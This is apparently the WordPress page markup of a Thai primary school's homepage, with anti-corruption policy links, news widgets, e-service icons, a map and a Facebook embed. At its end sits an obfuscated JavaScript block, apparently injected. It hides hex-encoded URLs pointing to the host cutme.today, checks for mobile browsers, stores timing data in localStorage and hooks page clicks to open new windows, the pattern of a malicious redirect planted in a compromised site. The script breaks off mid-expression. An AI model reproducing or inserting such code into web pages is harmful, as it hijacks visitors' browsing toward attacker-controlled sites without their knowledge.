data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 